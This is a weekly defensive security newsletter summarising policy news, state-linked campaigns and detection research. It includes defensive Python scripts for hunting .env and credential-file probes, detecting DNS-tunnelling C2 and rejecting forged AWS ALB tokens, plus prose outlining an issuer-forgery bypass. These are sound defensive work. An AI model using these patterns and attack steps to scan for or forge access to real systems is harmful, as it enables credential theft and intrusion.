CTO at NCSC Summary: week ending August 25th

Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.

Operationally this week nothing overly of note..

In the high-level this week:

  • Chevening India Cyber Security Fellowship – Chevening Awards announces – applications are open until October 10th – “The Chevening India Cyber Security Fellowship is aimed at mid-career professionals with demonstrable leadership potential in the field of cyber security or cyber policy in India. The fellowship is funded by the UK Foreign, Commonwealth, and Development Office.”

  • Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts – FBI and co state – “We have observed increasingly aggressive Iranian activity during this election cycle, specifically involving influence operations targeting the American public and cyber operations targeting presidential campaigns.”

  • Singapore’s Operational Technology Cybersecurity Masterplan 2024 – Singapore Cyber Security Agency publishes – “the Masterplan 2024 also outlines updates in the areas of People, Processes, and Technology to uplift cybersecurity postures as part of our continuous efforts to enhance the cybersecurity of sectors operating OT systems and technologies:

    1. Enhance the OT Cybersecurity Talent Pipeline

    2. Enhance Information Sharing and Reporting

    3. Uplift OT Cybersecurity Resilience beyond CII

    4. Establish an OT Cybersecurity Centre of Excellence and promote Secure-By-Deployment throughout the lifecycle of the OT systems”

  • A separate registry could be created for white hat hackers – Vedomosti reports from Russia – “The Federation Council, FSB, Ministry of Internal Affairs and information security (IS) companies are discussing the possibility of creating a register of white hackers and their certification. Vedomosti was told about this by three sources close to various information security companies. According to them, the issue was discussed at a closed meeting of department representatives in early August.”

  • Ukrainian hackers show war footage on Russian TV, source says – The Kyiv Independent news desk reports – “Hackers of Ukraine’s military intelligence agency (HUR) broke into servers of several Russian television channels and broadcasted “objective videos about the war in Ukraine,” a source in the agency told the Kyiv Independent on Aug. 22. According to the source, HUR’s footage was displayed three times on prime-time TV channels: Pervouralsk TV, Eurasia 360, Eurasia Pervyi Kanal, and others. The targeted channels further reportedly included Lugansk 24, Pervyi Respublikanskyi, SpB, Oplot, TV-3, and Pervyi Rosiyskyi. Some of the targeted channels belong to Russian oligarch Andrey Komarov.”

  • Bureaucratic initiative redefines German law enforcement cyber operations – Binding Hook asserts – “Even though technically feasible, the federal legal framework provides no basis to clean up victim systems (such as the Emotet quarantining), a measure that would be considered an emergency response (Gefahrenabwehr, in German). Constitutionally, police action to avert danger is the remit of state police. The BKA, by contrast, is tasked with criminal prosecution. Under this distribution of power, operations that remove malware without prosecution objectives lack a clear legal framework. As the BKA’s actions in the Emotet case show, currently, the deactivation of malware is only possible in combination with efforts to secure evidence and is, legally, considered a side effect.”

  • FAA Equipment, Systems, and Network Information Security Protection – Federal Aviation Administration notifies – “This proposed rulemaking would impose new design standards to address cybersecurity threats for transport category airplanes, engines, and propellers. The intended effect of this proposed action is to standardize the FAA’s criteria for addressing cybersecurity threats, reducing certification costs and time while maintaining the same level of safety provided by current special conditions”

  • North Korean IT developers also develop domestic apps?… “Risk of abuse as a hacking tool” – Korean Broadcasting System reports – “The number of North Korean IT workers revealed by the National Intelligence Service is in the thousands worldwide,” – how is that insider threat programme?

  • (US) Army Cyber Command Foundry program provides data-centric military intelligence training – US Army announces – “ARCYBER G2 officials explained that they developed the training program to provide streamlined and comprehensive training material on the technical aspects of cyber-based knowledge. The courses extract the requisite technical elements of commercial and military courses and blend them with intelligence practices and tradecraft instrumental to wide-ranging cyber-related missions in support of U.S. Cyber Command priorities.”

  • Reporting on/from China

  • Artificial intelligence

    • A benchmark for evaluating the cybersecurity capabilities and risks of language models – Stanford University publishes – “Cybench includes 40 professional-level Capture the Flag (CTF) tasks from 4 distinct CTF competitions, chosen to be recent, meaningful, and spanning a wide range of difficulties. We add subtasks, which break down a task into intermediary steps for more gradated evaluation, to 17 of the 40 tasks.”

    • The Global Race to Control A.I. – New York Times reports – “A.I. nationalism is part of a wider fracturing of the internet, where services vary based on local laws and national interests. What’s left is a new kind of tech world where the effects of A.I. in your life may just depend on where you live.”

    • Schumer Optimistic About Passing Federal AI Regulation This Year – Wall Street Journal reports – “We’re going to get a great AI package which keeps innovation as our North Star, hopefully through the Congress by the end of the year. We have great prospects,” said Senate Majority Leader Chuck Schumer (D., N.Y.).

    • California AI Regulation Bill Advances to Assembly Vote with Key Amendments – Campus Technology reports – “California’s “Safe and Secure Innovation for Frontier Artificial Intelligence Models Act” (Senate Bill 1047), spearheaded by Senator Scott Wiener (D-San Francisco), has cleared the Assembly Appropriations Committee with some significant amendments. The bill, aimed at establishing rigorous safety standards for large-scale artificial intelligence (AI) systems, is set for a vote on the Assembly floor on Aug. 20 and must pass by Aug. 31 to move forward”

    • South Africa National AI Policy Framework – South Africa government publishes – “The National Artificial Intelligence (AI) Policy Framework for South Africa (a first step in developing the National AI Policy) aims to promote the integration of Artificial Intelligence technologies to drive economic growth, enhance societal well-being, and position South Africa as a leader in AI innovation.”

  • Cyber proliferation

    • A Global Treaty to Fight Cybercrime—Without Combating Mercenary Spyware – Lawfare asserts – “The inability of the international community to generate consensus on matters concerning fundamental human rights leaves UN member states with the choice of whether to sign the treaty without key human rights safeguards. However, if history is a teacher, it tells that mandating cross-border cooperation without mandating robust human rights commitments is not a tenable path forward in the fight against transnational cybercrime.”

  • Bounty Hunting

    • Pulaski County Man Sentenced for Cyber Intrusion and Aggravated Identity Theft – US Department of Justice reports – “The Defendant committed cyber intrusions, by hacking into state death registry systems to fake his own death to avoid paying his child support obligations. He also hacked into private businesses and attempted to sell access to networks on the dark web”

    • Member of Russian cybercrime group charged in Ohio – US Department of Justice reports – “According to court documents, Zolotarjovs is a member of a known cybercriminal organization that attacks computer systems of victims around the world. Among other things, the Russian cybercrime group steals victim data and threatens to release it unless the victim pays ransom in cryptocurrency. The group maintains a leaks and auction website that lists victim companies and offers stolen data for download.”

  • CrowdStrike hits out at rivals’ ‘shady’ attacks after global IT outage – Financial Times reports – “the CrowdStrike executive said no vendor could “technically” guarantee that their own software would never cause a similar incident.” – might be true for vendors, but formal verification/methods might be a way..

  • InsurSec Can Drive An Effective Proactive Cybersecurity Strategy Says New Analyst Report – Omdia and At-Bay assert – “Cyber insurance requirements are a major factor in how organizations make security-buying decisions. 43% of all respondents report that cyber insurance requirements are a “major or leading driver” of cybersecurity spend. The percentage is even higher among the largest organizations, among which 52% report that cyber insurance requirements are a major driver of spending” – Report

Reflections this week come from the quality of applied cyber security research occurring in academia, as shown by the papers at USENIX Security ’24 Summer. The breadth is impressive and on multiple fronts: from the quality of vulnerability research on show, with a number of European universities clearly building impressive departments, through to the socio-technical aspects. Pull-through of this and other research is where the value will be realised, but it doesn’t appear that rapid pull-through via commercial partnerships exists at the level it should.


All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.

Have a lovely Friday..

Ollie

Who is doing what to whom and how allegedly.

The Ukrainian government (CERT-UA) details this campaign; the distribution mechanism is not mentioned. The notable element is the deployment of new capability.

The mentioned archive contains a CHM file “list of vp dropped out. kursk.chm”, which, among other things, contains an HTML file “part.html” containing JavaScript code, which in turn ensures the launch of an obfuscated PowerShell script.

The PowerShell code is designed to download components of the SPECTR malicious program (it steals documents, screenshots, Internet browser data, etc.) and the new FIRMACHAGENT program (“chrome_updater.dll”; the main task of which is to download stolen data to the management server).

https://cert.gov.ua/article/6280422

Malpedia alleges the Russian link:

Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine’s military and defense sectors.

https://malpedia.caad.fkie.fraunhofer.de/actor/uac-0020

Nothing this week

Christopher Lopez details this alleged North Korean campaign, whose sample is signed by a Hong Kong firm, Leap World Hongkong Limited.

A signed file named TodoTasks was uploaded to VirusTotal on 2024-07-24. This application shares several behaviors with malware we’ve seen that originated in North Korea (DPRK)—specifically the threat actor known as BlueNoroff—such as KandyKorn and RustBucket; given these commonalities, we believe this new malware—which we’re dubbing TodoSwift—is likely from the same source.

https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf

Asheer Malhotra, Guilherme Venere and Vitor Ventura detail this alleged North Korean campaign, which apparently shows signs of development discipline in terms of test-driven development.

  • Cisco Talos is exposing infrastructure we assess with high confidence is being used by a state-sponsored North Korean nexus of threat actors we track as “UAT-5394,” including for staging, command and control (C2) servers, and test machines the threat actors use to test their implants. 

  • Our analysis of the threat actor’s infrastructure indicates they pivoted across C2s and staging servers to set up new infrastructure and modify existing servers. 

  • This campaign consists of distributing a variant of the open-source XenoRAT malware we’re calling “MoonPeak,” a remote access trojan (RAT) being actively developed by the threat actor. 

  • Analysis of XenoRAT against MoonPeak malware samples we’ve discovered so far illustrates the evolution of the malware family after it was forked by the threat actors. 

https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/

Emma Brownstein alleges that North Korea were exploiting a zero-day known as CVE-2024-38193.

(We) discovered that the Lazarus group was exploiting a hidden security flaw in a crucial part of Windows called the AFD.sys driver. We also discovered that they used a special type of malware called Fudmodule to hide their activities from security software.

https://www.gendigital.com/blog/news/innovation/protecting-windows-users

This malware was also covered in February 2024, when it was exploiting a different zero-day, CVE-2024-21338 in appid.sys. If the reporting is accurate it shows they have at least one competent Windows driver vulnerability researcher and/or a source of such vulnerabilities.

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day

Joshua Miller, Georgi Mladenov, Andrew Northern, Greg Lesnewich and team detail this alleged Iranian campaign with notable victimology. That and the use of social engineering..

  • Proofpoint identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation.  

  • The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link. 

  • The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho by Proofpoint.  

  • The malware, which uses encryption and network communication techniques similar to previously observed TA453 samples, is designed to enable intelligence gathering and exfiltration. 

  • AnvilEcho contains all of TA453’s previously identified malware capabilities in a single PowerShell script rather than the modular approach previously observed.  

https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering

Insikt Group report on this alleged Iranian phishing-related infrastructure.

  • From May 2024 onward, GreenCharlie registered a large number of dynamic DNS (DDNS) domains that have highly likely been used for targeted social engineering and phishing operations.

  • Insikt Group has established a direct infrastructure link between GreenCharlie clusters and malware referred to in open sources as GORBLE, which is reportedly linked to the targeting of US political candidates.

  • Analysis of Recorded Future Network Intelligence indicates that GreenCharlie threat actors likely used ProtonVPN or ProtonMail to enable their operations.

  • Iranian IP addresses were identified communicating with GreenCharlie infrastructure, which is likely part of the operation’s spearphishing component.

  • GreenCharlie’s victimology includes research and policy analysts, government officials, diplomats, and high-value strategic targets. While Insikt Group has not identified direct evidence of the targeting of US government and political campaign officials, open-source reporting has enabled us to establish a credible link.

  • GreenCharlie highly likely operates at the behest of the Islamic Revolutionary Guard Corps (IRGC); due to its persistent and strategic remit, it is also likely to be associated with the Intelligence Organization of the IRGC (IRGC-IO).

https://go.recordedfuture.com/hubfs/reports/cta-ir-2024-0820.pdf

Will does what he does best in this release.

  • This repository contains a list of which tools each ransomware gang or extortionist gang uses

  • As defenders, we should exploit the fact that many of the tools used by these cybercriminals are often reused

  • We can threat hunt, deploy detections, and block these tools to eliminate the ability of adversaries to launch intrusions

  • This project will be updated as additional intelligence on ransomware gang TTPs is made available

https://github.com/BushidoUK/Ransomware-Tool-Matrix

https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html

RussianPanda shows how legitimately code-signed software is being integrated into malicious campaigns to avoid being detected or flagged as malicious.

Some of the Dolphin Loader payloads currently have zero detections on VirusTotal. Why? Because it uses legitimate, EV-signed remote management software to deliver the final payload. This approach is very convenient for the loader’s developer because it eliminates the need to obtain an EV certificate and end up paying a significant amount of money out-of-pocket. Leveraging legitimate RMM software to deliver malware also offers numerous advantages:

  • Since RMM tools are meant to run quietly in the background because they monitor and manage systems, malware leveraging these tools can operate stealthily, avoiding detection by users.

  • RMM tools already include features for remote command or script execution, system monitoring, and data exfiltration. Attackers can use these built-in functionalities to control compromised systems.

  • Organizations trust their RMM solutions for IT operations. This trust can be exploited by attackers to deliver malware without raising immediate suspicion from users or IT staff.

https://russianpanda.com/The-Abuse-of-ITarian-RMM-by-Dolphin-Loader

Unit 42 detail a campaign where the scale of scanning is the thing of note in this reporting, along with a trivially exploitable issue which can have devastating consequences.

Unit 42 researchers found an extortion campaign’s cloud operation that successfully compromised and extorted multiple victim organizations. It did so by leveraging exposed environment variable files (.env files) that contained sensitive variables such as credentials belonging to various applications.

Multiple security missteps were present in the course of this campaign, including the following:

  • Exposing environment variables

  • Using long-lived credentials

  • Absence of least privilege architecture

The campaign operation set up its attack infrastructure within various organizations’ Amazon Web Services (AWS) environments and used that groundwork to scan more than 230 million unique targets for sensitive information.

https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
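The practical follow-up to the Unit 42 reporting is to check your own access logs for this exact probing, and in particular for any probe that was answered with content. The script below is an added example written for this newsletter, not Unit 42's code or tooling. It parses Apache/nginx combined-format lines, flags requests for paths that commonly leak secrets (.env and its variants, .git/, .aws/credentials), counts probes per source address, and reports any such request that returned 200 with a body, which is the signal that a file was actually served. The log lines, addresses and paths are constructed; the path patterns are an assumed starting list you should extend.

```python
"""Hunt web server access logs for probes against exposed secret files.

Added example, not Unit 42's code. Input: Apache/nginx combined log format.
Output: probes per source IP, breakdown by kind, and confirmed exposures
(sensitive path answered with 200 and a non-empty body).
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumed starting list of paths worth alerting on. Query strings are stripped first.
SENSITIVE_PATHS = [
    ("dotenv", re.compile(r"(?:^|/)\.env(?:\.[\w-]+)?$")),   # .env, .env.bak, .env.production ...
    ("git", re.compile(r"(?:^|/)\.git(?:/|$)")),            # .git/config, .git/HEAD
    ("aws-credentials", re.compile(r"(?:^|/)\.aws/credentials$")),
]

# Constructed sample: one legitimate client, one scanner that gets lucky on /api/.env.
SAMPLE_LOG = """\
198.51.100.8 - - [20/Aug/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120
203.0.113.5 - - [20/Aug/2024:10:01:05 +0000] "GET /.env HTTP/1.1" 404 153
203.0.113.5 - - [20/Aug/2024:10:01:05 +0000] "GET /.env.bak HTTP/1.1" 404 153
203.0.113.5 - - [20/Aug/2024:10:01:06 +0000] "GET /.git/config HTTP/1.1" 404 153
203.0.113.5 - - [20/Aug/2024:10:01:06 +0000] "GET /api/.env HTTP/1.1" 200 1337
203.0.113.5 - - [20/Aug/2024:10:01:07 +0000] "GET /.aws/credentials HTTP/1.1" 403 0
198.51.100.8 - - [20/Aug/2024:10:02:11 +0000] "GET /static/app.js?v=3 HTTP/1.1" 200 88211
198.51.100.8 - - [20/Aug/2024:10:02:12 +0000] "GET /environment HTTP/1.1" 200 2048
"""


def classify_path(raw_path: str):
    """Return the sensitive-path label for a request path, or None."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    for label, pattern in SENSITIVE_PATHS:
        if pattern.search(path):
            return label
    return None


def hunt(log_text: str) -> dict:
    probes = Counter()   # source ip -> number of sensitive-path requests
    by_kind = Counter()  # label -> count
    exposed = []         # (ip, path, status, size) where the server returned content
    unparsed = 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        label = classify_path(m["path"])
        if label is None:
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        probes[m["ip"]] += 1
        by_kind[label] += 1
        # 200 with a body means the secret was served. A site that answers 200 to
        # everything (soft-404) will false-positive here; confirm by fetching the body.
        if status == 200 and size > 0:
            exposed.append((m["ip"], m["path"], status, size))
    return {"probes": dict(probes), "by_kind": dict(by_kind),
            "exposed": exposed, "unparsed": unparsed}


def scanners(report: dict, min_probes: int = 3) -> list:
    """Source addresses that hit several sensitive paths: block or watch-list them."""
    return sorted(ip for ip, n in report["probes"].items() if n >= min_probes)


if __name__ == "__main__":
    report = hunt(SAMPLE_LOG)
    for ip, path, status, size in report["exposed"]:
        print(f"EXPOSED: {ip} fetched {path} ({status}, {size} bytes)")
    print("scanners:", scanners(report))
    print("by kind:", report["by_kind"])
```

Run it over a real log with `hunt(open("access.log").read())`; anything in `exposed` means the credentials in that file should be treated as compromised and rotated, which is exactly the long-lived-credential misstep the quote calls out.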

Symantec detail this unattributed but interesting campaign which solely uses DNS for command and control. Also interesting that a recent web server vulnerability is apparently being used for initial access.

A previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique was deployed in an attack against a university in Taiwan. 

The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic. While the technique is known and has been used by multiple threat actors, it is nevertheless something that is not often seen. 

..

The initial intrusion was likely through the exploit of a recently patched PHP vulnerability (CVE-2024-4577). The vulnerability is a CGI argument injection flaw affecting all versions of PHP installed on the Windows operating system. Successful exploitation of the vulnerability can lead to remote code execution. 

https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns
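DNS as the only C2 channel is, as Symantec says, known but rarely seen, so it is worth having a hunt for it in resolver logs. The script below is an added example written for this newsletter, not Symantec's detection logic, and it knows nothing about Msupedge's specific encoding. It applies the general heuristic for DNS tunnelling: one client issuing many unique subdomains under a single registered domain, whose leftmost labels are long and high-entropy because they carry encoded data, with a bias towards TXT/NULL record types. The log format (`<epoch> <client_ip> <qname> <qtype>`), the client addresses and the domain `c2-example.test` are constructed; the registered-domain split uses the last two labels, a simplification that production code should replace with the Public Suffix List.

```python
"""Flag DNS-tunnelled command and control from resolver query logs.

Added example, not Symantec's code. Heuristic: many unique, long, high-entropy
subdomains under one registered domain from one client, skewed to TXT/NULL.
"""
import hashlib
import math
from collections import defaultdict


def build_sample_log() -> str:
    """Constructed log. c2-example.test stands in for a tunnelling C2 domain."""
    lines = [
        "1724400001 10.0.0.7 www.example.com A",
        "1724400002 10.0.0.7 mail.example.com MX",
        "1724400003 10.0.0.7 example.com TXT",
    ]
    # Benign noise: many unique CDN hostnames, but short, low-entropy labels.
    for i in range(12):
        lines.append(f"17244001{i:02d} 10.0.0.7 cdn{i}.static.example.com A")
    # Tunnel pattern: each query smuggles a chunk of data in a long hex label.
    for i in range(24):
        chunk = hashlib.sha256(f"exfil-chunk-{i}".encode()).hexdigest()[:48]
        lines.append(f"17244002{i:02d} 10.0.0.9 {chunk}.c2-example.test TXT")
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()


def shannon_entropy(s: str) -> float:
    """Bits per character: ~3.5-4.0 for hex/base32 data, well under 3 for ordinary hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Simplification: last two labels. Use the Public Suffix List in production."""
    return ".".join(qname.split(".")[-2:])


def parse_log(text: str):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the hunt
        ts, client, qname, qtype = parts
        yield int(ts), client, qname.rstrip(".").lower(), qtype.upper()


def analyse(records, min_unique=10, min_label_len=20, min_entropy=3.0):
    """Return one alert per (client, registered domain) that looks like a tunnel."""
    new = lambda: {"prefixes": set(), "ent": 0.0, "length": 0, "labelled": 0, "data_qtypes": 0, "total": 0}
    stats = defaultdict(new)
    for _, client, qname, qtype in records:
        domain = registered_domain(qname)
        prefix = qname[: -len(domain)].rstrip(".")  # everything left of the registered domain
        s = stats[(client, domain)]
        s["total"] += 1
        if qtype in ("TXT", "NULL"):
            s["data_qtypes"] += 1
        if not prefix:
            continue
        leftmost = prefix.split(".")[0]  # the label most likely to carry encoded data
        s["prefixes"].add(prefix)
        s["labelled"] += 1
        s["ent"] += shannon_entropy(leftmost)
        s["length"] += len(leftmost)
    alerts = []
    for (client, domain), s in stats.items():
        if len(s["prefixes"]) < min_unique:
            continue
        mean_ent = s["ent"] / s["labelled"]
        mean_len = s["length"] / s["labelled"]
        if mean_ent >= min_entropy and mean_len >= min_label_len:
            alerts.append({"client": client, "domain": domain,
                           "unique_subdomains": len(s["prefixes"]),
                           "mean_entropy": round(mean_ent, 2),
                           "mean_label_len": round(mean_len, 1),
                           "data_qtype_ratio": round(s["data_qtypes"] / s["total"], 2)})
    return sorted(alerts, key=lambda a: (-a["unique_subdomains"], a["client"]))


if __name__ == "__main__":
    for alert in analyse(parse_log(SAMPLE_LOG)):
        print(alert)
```

The benign client in the sample also produces more than ten unique subdomains (the CDN hostnames) and is not flagged, because the length and entropy thresholds do the discriminating; tune those three thresholds against a week of your own resolver data before alerting on them.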

How we find and understand the latent compromises within our environments.

Microsoft’s documentation of the Windows Update log files and the Get-WindowsUpdateLog PowerShell cmdlet – useful to support detection of Windows Downdate (see below).

https://learn.microsoft.com/en-us/windows/deployment/update/windows-update-logs

Michael Haag releases a new capability to detect webshells – go forth and discover latent compromises!

ShellSweepX is an advanced, ML-powered web shell detection and analysis platform designed to enhance your organization’s cybersecurity posture. By leveraging machine learning algorithms and YARA rules, ShellSweepX provides robust protection against web-based threats, particularly focusing on the identification and analysis of potential web shells.

https://github.com/splunk/ShellSweep/wiki/ShellSweepX

AbdulRhman Alfaifi shows the value of tracking feature evolution as a source of forensic opportunity.

On Windows 11, Notepad stores a cache of recently opened files. This cache contains valuable information, such as file paths, file contents, and other useful data. In this article, we will examine the structure of the Notepad cache and provide a custom parser to extract this information for forensic investigations.

https://u0041.co/posts/articals/exploring-windows-artifacts-notepad-files/

How we proactively defend our environments.

ASD + 5EYES + friends co-seal these best practices.. go forth and log!

This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) in cooperation with the following international partners:

  • United States (US) Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA)

  • United Kingdom (UK) National Cyber Security Centre (NCSC-UK)

  • Canadian Centre for Cyber Security (CCCS)

  • New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team (CERT NZ)

  • Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and Computer Emergency Response Team Coordination Center (JPCERT/CC)

  • The Republic of Korea National Intelligence Services (NIS) and NIS’s National Cyber Security Center (NCSC-Korea)

  • Singapore Cyber Security Agency (CSA)

  • The Netherlands General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD).

..

There are four key factors to consider when pursuing logging best practices:

  1. enterprise-approved event logging policy

  2. centralised event log access and correlation

  3. secure storage and event log integrity

  4. detection strategy for relevant threats.

https://media.defense.gov/2024/Aug/21/2003530453/-1/-1/0/JOINT-CSI-BEST-PRACTICES-EVENT-LOGGING-THREAT-DETECTION.PDF

Jonathan Walker provides an interesting analysis..

https://www.securityrunners.io/post/exposing-security-observability-gaps-in-aws

Daniel Shechter details an evidently common configuration weakness that organisations should check they are not affected by, given the authentication bypass it enables.

First, the attacker creates their own ALB instance with authentication configured in their account. The attacker then uses this ALB to sign a token they fully control. Next, the attacker alters the ALB configuration and sets the issuer field to the victim’s expected issuer. AWS subsequently signs the attacker’s forged token with the victim’s issuer. Finally, the attacker uses this minted token against the victim’s application, bypassing both authentication and authorization.

..

On July 19th, 2024, AWS updated the authentication feature documentation to clarify best practices for Security Groups: “Also, as a security best practice we recommend you restrict your targets to only receive traffic from your Application Load Balancer. You can achieve this by configuring your targets’ security group to reference the load balancer’s security group ID.”

..

AWS does not consider issuer forging an ALB vulnerability and has stated that the service operates as intended. They highlighted the shared responsibility model, suggesting that customers should ensure their code and configurations are up-to-date to mitigate this issue.

..

We identified over 15,000 (out of 371,000*) potentially vulnerable ALBs and applications using AWS ALB’s authentication feature. We’ve done our best to contact each affected organization with our findings and provide support where needed.

https://www.miggo.io/resources/albeast-security-advisory-alb-vulnerability
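The security-group change quoted above stops direct-to-target traffic; the application-side fix is to stop trusting any token that AWS happened to sign. The code below is an added example written for this newsletter, not Miggo’s or AWS’s code. AWS’s ALB authentication documentation states that the JWT forwarded in `x-amzn-oidc-data` carries a `signer` field in its header holding the ARN of the load balancer that minted it, and that the verification key is served from `https://public-keys.auth.elb.<region>.amazonaws.com/<kid>`. The attack in the quote works because an attacker’s ALB in the same region also gets a `kid` that resolves to a genuine AWS key, so signature and issuer checks both pass; pinning `signer` to your own ALB’s ARN is what breaks it. The ARNs, issuer and key id are assumed placeholders, the tokens are constructed with a placeholder signature, and ES256 verification is injected as a function so the logic runs offline (in production back it with a JWT library and the key from `fetch_alb_public_key`).

```python
"""Validate the x-amzn-oidc-data JWT an ALB forwards after authenticating a user.

Added example, not Miggo's or AWS's code. Shows the weak pattern (signature +
issuer only) beside the hardened one (also pins the 'signer' header to our ALB).
"""
import base64
import json
import time
import urllib.request

# Assumed placeholders for the demo.
VICTIM_ALB_ARN = "arn:aws:elasticloadbalancing:eu-west-1:123456789012:loadbalancer/app/victim-alb/0123456789abcdef"
ATTACKER_ALB_ARN = "arn:aws:elasticloadbalancing:eu-west-1:999999999999:loadbalancer/app/evil-alb/fedcba9876543210"
EXPECTED_ISSUER = "https://idp.example.com/"  # OIDC issuer configured on the victim ALB
NOW = 1_724_400_000                           # fixed clock for the constructed tokens


def fetch_alb_public_key(region: str, kid: str) -> bytes:
    """Documented AWS endpoint serving the PEM public key for an ALB key id."""
    url = f"https://public-keys.auth.elb.{region}.amazonaws.com/{kid}"
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))  # tolerate padded or unpadded


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def split_token(token: str):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), f"{h}.{p}".encode(), _b64url_decode(s)


def validate_alb_token(token, *, expected_issuer, expected_signer, verify_signature,
                       now=None, check_signer=True):
    """Return (accepted, reason). check_signer=False reproduces the weak pattern."""
    header, payload, signing_input, signature = split_token(token)
    if header.get("alg") != "ES256" or not header.get("kid"):
        return False, "unexpected alg or missing kid"
    # verify_signature fetches the key for header['kid']; an attacker's ALB has a kid too.
    if not verify_signature(header["kid"], signing_input, signature):
        return False, "signature invalid"
    if header.get("iss") != expected_issuer:
        return False, "issuer mismatch"
    # The check the advisory adds: the token must come from OUR load balancer.
    if check_signer and header.get("signer") != expected_signer:
        return False, "signer mismatch: token minted by a different load balancer"
    exp = header.get("exp", payload.get("exp"))
    if exp is None or (now if now is not None else time.time()) >= exp:
        return False, "expired"
    return True, "ok"


def make_demo_token(header: dict, payload: dict) -> str:
    """Constructed token with a placeholder signature, for exercising the checks only."""
    return ".".join([_b64url_encode(json.dumps(header).encode()),
                     _b64url_encode(json.dumps(payload).encode()),
                     _b64url_encode(b"placeholder-signature")])


def aws_signed(kid: str, signing_input: bytes, signature: bytes) -> bool:
    """Stand-in for ES256 verification. Always True models the fact that AWS really
    did sign the attacker's token, so signature checking alone cannot reject it."""
    return True


def demo_tokens():
    """(legitimate token from our ALB, forged token from the attacker's ALB)."""
    base = {"alg": "ES256", "kid": "0123abcd-kid", "client": "client-id", "exp": NOW + 120}
    claims = {"sub": "user", "email": "admin@victim.example", "exp": NOW + 120}
    legit = make_demo_token({**base, "signer": VICTIM_ALB_ARN, "iss": EXPECTED_ISSUER}, claims)
    forged = make_demo_token({**base, "signer": ATTACKER_ALB_ARN, "iss": EXPECTED_ISSUER}, claims)
    return legit, forged


if __name__ == "__main__":
    legit, forged = demo_tokens()
    common = dict(expected_issuer=EXPECTED_ISSUER, expected_signer=VICTIM_ALB_ARN,
                  verify_signature=aws_signed, now=NOW)
    print("weak  / forged:", validate_alb_token(forged, check_signer=False, **common))
    print("strict/ forged:", validate_alb_token(forged, **common))
    print("strict/ legit :", validate_alb_token(legit, **common))
```

The weak path accepts the forged token with the victim’s issuer, exactly as the quote describes; the strict path rejects it on `signer` before ever looking at the user claims. Keep the security-group restriction as well, since a target reachable directly can be handed a token without the ALB in the path at all.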

Alex Bocharov and Adam Martinetti show an evolution in JA4 application which is fascinating..

JA4 Signals are inter-request features computed based on the last hour of all traffic that Cloudflare sees globally. On a daily basis, we analyze over 15 million unique JA4 fingerprints generated from more than 500 million user agents and billions of IP addresses. This breadth of data enables JA4 Signals to provide aggregated statistics that offer deeper insights into global traffic patterns – far beyond what single-request or connection fingerprinting can achieve. These signals are crucial for enhancing security measures, whether through simple firewall rules, Workers scripts, or advanced machine learning models.

https://blog.cloudflare.com/ja4-signals

How they got in and what they did.

Nothing this week

Our attack surface.

Vendor advisory.

An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015

Henry Birge-Lee, Maria Apostolaki and Jennifer Rexford detail a twist which may cause some detection headaches..

